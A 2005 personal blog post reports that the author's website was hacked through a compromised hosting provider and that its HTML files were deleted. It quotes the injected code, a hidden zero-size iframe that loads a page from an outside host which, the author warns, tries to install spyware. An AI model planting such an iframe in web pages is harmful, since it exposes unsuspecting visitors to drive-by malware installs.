4/04/2005

Web Site Hacked

One of my web sites was recently hacked. I found that out just about an hour ago when I went to check it out. A friend, Christine, has been working on it for free. She put a lot of time into it already. All of her html files were deleted. I found this script on the index page. iframe src="http://www.7sir7.com/abx2.html" frameborder=0 width=0 height=0 marginwidth=0 marginheight=0 scrolling=no /iframe, minus the closing tags. It seems that iPowerWeb, my hosting provider for several of my web sites had their servers compromised. This web site was not affected. I hope that the people involved are caught and strung up on a pole. Also,7sir7.com is a hacking site. It will attempt to install spyware on your machine. Do not visit it.

No comments:

Post a Comment

Feel free to post your thoughts... Try to keep it clean.